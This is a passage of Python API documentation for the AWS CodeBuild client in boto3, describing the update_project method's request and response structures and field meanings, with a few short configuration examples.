* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **secondarySourceVersions** *(list) --*
An array of ``ProjectSourceVersion`` objects. Each ``ProjectSourceVersion`` must be one of:
* For AWS CodeCommit: the commit ID to use.
* For GitHub: the commit ID, pull request ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a pull request ID is specified, it must use the format ``pr/pull-request-ID`` (for example, ``pr/25`` ). If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Bitbucket: the commit ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Amazon Simple Storage Service (Amazon S3): the version ID of the object that represents the build input ZIP file to use.
- *(dict) --*
A source identifier and its corresponding version.
- **sourceIdentifier** *(string) --*
An identifier for a source in the build project.
- **sourceVersion** *(string) --*
The source version for the corresponding source identifier. If specified, must be one of:
* For AWS CodeCommit: the commit ID to use.
* For GitHub: the commit ID, pull request ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a pull request ID is specified, it must use the format ``pr/pull-request-ID`` (for example, ``pr/25`` ). If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Bitbucket: the commit ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Amazon Simple Storage Service (Amazon S3): the version ID of the object that represents the build input ZIP file to use.
- **artifacts** *(dict) --*
Information about the output artifacts for the build.
- **location** *(string) --*
Information about the location of the build artifacts.
- **sha256sum** *(string) --*
The SHA-256 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **md5sum** *(string) --*
The MD5 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Information that tells you if encryption for build artifacts is disabled.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **secondaryArtifacts** *(list) --*
An array of ``ProjectArtifacts`` objects.
- *(dict) --*
Information about build output artifacts.
- **location** *(string) --*
Information about the location of the build artifacts.
- **sha256sum** *(string) --*
The SHA-256 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **md5sum** *(string) --*
The MD5 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Information that tells you if encryption for build artifacts is disabled.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **cache** *(dict) --*
Information about the cache for the build.
- **type** *(string) --*
The type of cache used by the build project. Valid values include:
* ``NO_CACHE`` : The build project does not use any cache.
* ``S3`` : The build project reads and writes from and to S3.
* ``LOCAL`` : The build project stores a cache locally on a build host that is only available to that build host.
- **location** *(string) --*
Information about the cache location:
* ``NO_CACHE`` or ``LOCAL`` : This value is ignored.
* ``S3`` : This is the S3 bucket name/prefix.
- **modes** *(list) --*
If you use a ``LOCAL`` cache, the local cache mode. You can use one or more local cache modes at the same time.
* ``LOCAL_SOURCE_CACHE`` mode caches Git metadata for primary and secondary sources. After the cache is created, subsequent builds pull only the change between commits. This mode is a good choice for projects with a clean working directory and a source that is a large Git repository. If you choose this option and your project does not use a Git repository (GitHub, GitHub Enterprise, or Bitbucket), the option is ignored.
* ``LOCAL_DOCKER_LAYER_CACHE`` mode caches existing Docker layers. This mode is a good choice for projects that build or pull large Docker images. It can prevent the performance issues caused by pulling large Docker images down from the network.
.. note::
* You can use a Docker layer cache in the Linux environment only.
* The ``privileged`` flag must be set so that your project has the required Docker permissions.
* You should consider the security implications before you use a Docker layer cache.
* ``LOCAL_CUSTOM_CACHE`` mode caches directories you specify in the buildspec file. This mode is a good choice if your build scenario is not suited to one of the other two local cache modes. If you use a custom cache:
* Only directories can be specified for caching. You cannot specify individual files.
* Symlinks are used to reference cached directories.
* Cached directories are linked to your build before it downloads its project sources. Cached items are overridden if a source item has the same name. Directories are specified using cache paths in the buildspec file.
- *(string) --*
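As a sketch (the project name is hypothetical), a local cache combining the modes above can be set on a project; ``LOCAL_DOCKER_LAYER_CACHE`` additionally requires ``privilegedMode`` on the environment ::
cache = {
    'type': 'LOCAL',
    'modes': [
        'LOCAL_SOURCE_CACHE',        # cache Git metadata between builds
        'LOCAL_DOCKER_LAYER_CACHE',  # needs privilegedMode=True on the environment
    ]
}
client.update_project(name='my-project', cache=cache)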
- **environment** *(dict) --*
Information about the build environment for this build.
- **type** *(string) --*
The type of build environment to use for related builds.
- **image** *(string) --*
The image tag or image digest that identifies the Docker image to use for this build project. Use the following formats:
* For an image tag: ``registry/repository:tag`` . For example, to specify an image with the tag "latest," use ``registry/repository:latest`` .
* For an image digest: ``registry/repository@digest`` . For example, to specify an image with the digest "sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf," use ``registry/repository@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf`` .
- **computeType** *(string) --*
Information about the compute resources the build project uses. Available values include:
* ``BUILD_GENERAL1_SMALL`` : Use up to 3 GB memory and 2 vCPUs for builds.
* ``BUILD_GENERAL1_MEDIUM`` : Use up to 7 GB memory and 4 vCPUs for builds.
* ``BUILD_GENERAL1_LARGE`` : Use up to 15 GB memory and 8 vCPUs for builds.
- **environmentVariables** *(list) --*
A set of environment variables to make available to builds for this build project.
- *(dict) --*
Information about an environment variable for a build project or a build.
- **name** *(string) --*
The name or key of the environment variable.
- **value** *(string) --*
The value of the environment variable.
.. warning::
We strongly discourage the use of environment variables to store sensitive values, especially AWS secret key IDs and secret access keys. Environment variables can be displayed in plain text using the AWS CodeBuild console and the AWS Command Line Interface (AWS CLI).
- **type** *(string) --*
The type of environment variable. Valid values include:
* ``PARAMETER_STORE`` : An environment variable stored in Amazon EC2 Systems Manager Parameter Store.
* ``PLAINTEXT`` : An environment variable in plaintext format.
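Per the warning above, sensitive values belong in Parameter Store rather than in plaintext. A minimal sketch; the parameter name ``/my-app/db-password`` is illustrative ::
environment_variables = [
    {'name': 'STAGE', 'value': 'prod', 'type': 'PLAINTEXT'},
    # The value is the Parameter Store parameter name, not the secret itself;
    # CodeBuild resolves it at build time.
    {'name': 'DB_PASSWORD', 'value': '/my-app/db-password', 'type': 'PARAMETER_STORE'},
]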
- **privilegedMode** *(boolean) --*
Enables running the Docker daemon inside a Docker container. Set to true only if the build project is used to build Docker images, and the specified build environment image is not provided by AWS CodeBuild with Docker support. Otherwise, all associated builds that attempt to interact with the Docker daemon fail. You must also start the Docker daemon so that builds can interact with it. One way to do this is to initialize the Docker daemon during the install phase of your build spec by running the following build commands. (Do not run these commands if the specified build environment image is provided by AWS CodeBuild with Docker support.)
If the operating system's base image is Ubuntu Linux:
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 sh -c "until docker info; do echo .; sleep 1; done"``
If the operating system's base image is Alpine Linux, add the ``-t`` argument to ``timeout`` :
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout -t 15 sh -c "until docker info; do echo .; sleep 1; done"``
- **certificate** *(string) --*
The certificate to use with this build project.
- **registryCredential** *(dict) --*
The credentials for access to a private registry.
- **credential** *(string) --*
The Amazon Resource Name (ARN) or name of credentials created using AWS Secrets Manager.
.. note::
The ``credential`` can use the name of the credentials only if they exist in your current region.
- **credentialProvider** *(string) --*
The service that created the credentials to access a private Docker registry. The valid value, SECRETS_MANAGER, is for AWS Secrets Manager.
- **imagePullCredentialsType** *(string) --*
The type of credentials AWS CodeBuild uses to pull images in your build. There are two valid values:
* ``CODEBUILD`` specifies that AWS CodeBuild uses its own credentials. This requires that you modify your ECR repository policy to trust AWS CodeBuild's service principal.
* ``SERVICE_ROLE`` specifies that AWS CodeBuild uses your build project's service role.
When you use a cross-account or private registry image, you must use SERVICE_ROLE credentials. When you use an AWS CodeBuild curated image, you must use CODEBUILD credentials.
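Tying the two fields above together, pulling the build image from a private registry pairs ``SERVICE_ROLE`` credentials with a Secrets Manager secret. A sketch; the image name and secret ARN are illustrative ::
environment = {
    'type': 'LINUX_CONTAINER',
    'image': 'registry.example.com/builder:latest',  # hypothetical private image
    'computeType': 'BUILD_GENERAL1_SMALL',
    'imagePullCredentialsType': 'SERVICE_ROLE',  # required for private registries
    'registryCredential': {
        'credential': 'arn:aws:secretsmanager:us-east-1:123456789012:secret:registry-creds',
        'credentialProvider': 'SECRETS_MANAGER'
    }
}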
- **serviceRole** *(string) --*
The name of a service role used for this build.
- **logs** *(dict) --*
Information about the build's logs in Amazon CloudWatch Logs.
- **groupName** *(string) --*
The name of the Amazon CloudWatch Logs group for the build logs.
- **streamName** *(string) --*
The name of the Amazon CloudWatch Logs stream for the build logs.
- **deepLink** *(string) --*
The URL to an individual build log in Amazon CloudWatch Logs.
- **s3DeepLink** *(string) --*
The URL to a build log in an S3 bucket.
- **cloudWatchLogs** *(dict) --*
Information about Amazon CloudWatch Logs for a build project.
- **status** *(string) --*
The current status of the logs in Amazon CloudWatch Logs for a build project. Valid values are:
* ``ENABLED`` : Amazon CloudWatch Logs are enabled for this build project.
* ``DISABLED`` : Amazon CloudWatch Logs are not enabled for this build project.
- **groupName** *(string) --*
The group name of the logs in Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **streamName** *(string) --*
The prefix of the stream name of the Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **s3Logs** *(dict) --*
Information about S3 logs for a build project.
- **status** *(string) --*
The current status of the S3 build logs. Valid values are:
* ``ENABLED`` : S3 build logs are enabled for this build project.
* ``DISABLED`` : S3 build logs are not enabled for this build project.
- **location** *(string) --*
The ARN of an S3 bucket and the path prefix for S3 logs. If your Amazon S3 bucket name is ``my-bucket`` , and your path prefix is ``build-log`` , then acceptable formats are ``my-bucket/build-log`` or ``arn:aws:s3:::my-bucket/build-log`` .
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your S3 build log output encrypted. By default S3 build logs are encrypted.
- **timeoutInMinutes** *(integer) --*
How long, in minutes, AWS CodeBuild waits before timing out this build if it does not get marked as completed.
- **queuedTimeoutInMinutes** *(integer) --*
The number of minutes a build is allowed to be queued before it times out.
- **buildComplete** *(boolean) --*
Whether the build is complete. True if complete; otherwise, false.
- **initiator** *(string) --*
The entity that started the build. Valid values include:
* If AWS CodePipeline started the build, the pipeline's name (for example, ``codepipeline/my-demo-pipeline`` ).
* If an AWS Identity and Access Management (IAM) user started the build, the user's name (for example, ``MyUserName`` ).
* If the Jenkins plugin for AWS CodeBuild started the build, the string ``CodeBuild-Jenkins-Plugin`` .
- **vpcConfig** *(dict) --*
If your AWS CodeBuild project accesses resources in an Amazon VPC, you provide this parameter, which identifies the VPC ID and the list of security group IDs and subnet IDs. The security groups and subnets must belong to the same VPC. You must provide at least one security group and one subnet ID.
- **vpcId** *(string) --*
The ID of the Amazon VPC.
- **subnets** *(list) --*
A list of one or more subnet IDs in your Amazon VPC.
- *(string) --*
- **securityGroupIds** *(list) --*
A list of one or more security group IDs in your Amazon VPC.
- *(string) --*
- **networkInterface** *(dict) --*
Describes a network interface.
- **subnetId** *(string) --*
The ID of the subnet.
- **networkInterfaceId** *(string) --*
The ID of the network interface.
- **encryptionKey** *(string) --*
The AWS Key Management Service (AWS KMS) customer master key (CMK) to be used for encrypting the build output artifacts.
.. note::
You can use a cross-account KMS key to encrypt the build output artifacts if your service role has permission to that key.
You can specify either the Amazon Resource Name (ARN) of the CMK or, if available, the CMK's alias (using the format ``alias/*alias-name* `` ).
:type id: string
:param id: **[REQUIRED]**
The ID of the build.
:rtype: dict
:returns:
"""
pass
def update_project(self, name: str, description: str = None, source: Dict = None, secondarySources: List = None, artifacts: Dict = None, secondaryArtifacts: List = None, cache: Dict = None, environment: Dict = None, serviceRole: str = None, timeoutInMinutes: int = None, queuedTimeoutInMinutes: int = None, encryptionKey: str = None, tags: List = None, vpcConfig: Dict = None, badgeEnabled: bool = None, logsConfig: Dict = None) -> Dict:
"""
Changes the settings of a build project.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/UpdateProject>`_
**Request Syntax**
::
response = client.update_project(
name='string',
description='string',
source={
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
secondarySources=[
{
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
],
artifacts={
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
secondaryArtifacts=[
{
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
],
cache={
'type': 'NO_CACHE'|'S3'|'LOCAL',
'location': 'string',
'modes': [
'LOCAL_DOCKER_LAYER_CACHE'|'LOCAL_SOURCE_CACHE'|'LOCAL_CUSTOM_CACHE',
]
},
environment={
'type': 'WINDOWS_CONTAINER'|'LINUX_CONTAINER',
'image': 'string',
'computeType': 'BUILD_GENERAL1_SMALL'|'BUILD_GENERAL1_MEDIUM'|'BUILD_GENERAL1_LARGE',
'environmentVariables': [
{
'name': 'string',
'value': 'string',
'type': 'PLAINTEXT'|'PARAMETER_STORE'
},
],
'privilegedMode': True|False,
'certificate': 'string',
'registryCredential': {
'credential': 'string',
'credentialProvider': 'SECRETS_MANAGER'
},
'imagePullCredentialsType': 'CODEBUILD'|'SERVICE_ROLE'
},
serviceRole='string',
timeoutInMinutes=123,
queuedTimeoutInMinutes=123,
encryptionKey='string',
tags=[
{
'key': 'string',
'value': 'string'
},
],
vpcConfig={
'vpcId': 'string',
'subnets': [
'string',
],
'securityGroupIds': [
'string',
]
},
badgeEnabled=True|False,
logsConfig={
'cloudWatchLogs': {
'status': 'ENABLED'|'DISABLED',
'groupName': 'string',
'streamName': 'string'
},
's3Logs': {
'status': 'ENABLED'|'DISABLED',
'location': 'string',
'encryptionDisabled': True|False
}
}
)
**Response Syntax**
::
{
'project': {
'name': 'string',
'arn': 'string',
'description': 'string',
'source': {
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
'secondarySources': [
{
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
],
'artifacts': {
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
'secondaryArtifacts': [
{
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
],
'cache': {
'type': 'NO_CACHE'|'S3'|'LOCAL',
'location': 'string',
'modes': [
'LOCAL_DOCKER_LAYER_CACHE'|'LOCAL_SOURCE_CACHE'|'LOCAL_CUSTOM_CACHE',
]
},
'environment': {
'type': 'WINDOWS_CONTAINER'|'LINUX_CONTAINER',
'image': 'string',
'computeType': 'BUILD_GENERAL1_SMALL'|'BUILD_GENERAL1_MEDIUM'|'BUILD_GENERAL1_LARGE',
'environmentVariables': [
{
'name': 'string',
'value': 'string',
'type': 'PLAINTEXT'|'PARAMETER_STORE'
},
],
'privilegedMode': True|False,
'certificate': 'string',
'registryCredential': {
'credential': 'string',
'credentialProvider': 'SECRETS_MANAGER'
},
'imagePullCredentialsType': 'CODEBUILD'|'SERVICE_ROLE'
},
'serviceRole': 'string',
'timeoutInMinutes': 123,
'queuedTimeoutInMinutes': 123,
'encryptionKey': 'string',
'tags': [
{
'key': 'string',
'value': 'string'
},
],
'created': datetime(2015, 1, 1),
'lastModified': datetime(2015, 1, 1),
'webhook': {
'url': 'string',
'payloadUrl': 'string',
'secret': 'string',
'branchFilter': 'string',
'filterGroups': [
[
{
'type': 'EVENT'|'BASE_REF'|'HEAD_REF'|'ACTOR_ACCOUNT_ID'|'FILE_PATH',
'pattern': 'string',
'excludeMatchedPattern': True|False
},
],
],
'lastModifiedSecret': datetime(2015, 1, 1)
},
'vpcConfig': {
'vpcId': 'string',
'subnets': [
'string',
],
'securityGroupIds': [
'string',
]
},
'badge': {
'badgeEnabled': True|False,
'badgeRequestUrl': 'string'
},
'logsConfig': {
'cloudWatchLogs': {
'status': 'ENABLED'|'DISABLED',
'groupName': 'string',
'streamName': 'string'
},
's3Logs': {
'status': 'ENABLED'|'DISABLED',
'location': 'string',
'encryptionDisabled': True|False
}
}
}
}
**Response Structure**
- *(dict) --*
- **project** *(dict) --*
Information about the build project that was changed.
- **name** *(string) --*
The name of the build project.
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the build project.
- **description** *(string) --*
A description that makes the build project easy to identify.
- **source** *(dict) --*
Information about the build input source code for this build project.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **secondarySources** *(list) --*
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build input source code for the build project.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **artifacts** *(dict) --*
Information about the build output artifacts for the build project.
- **type** *(string) --*
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
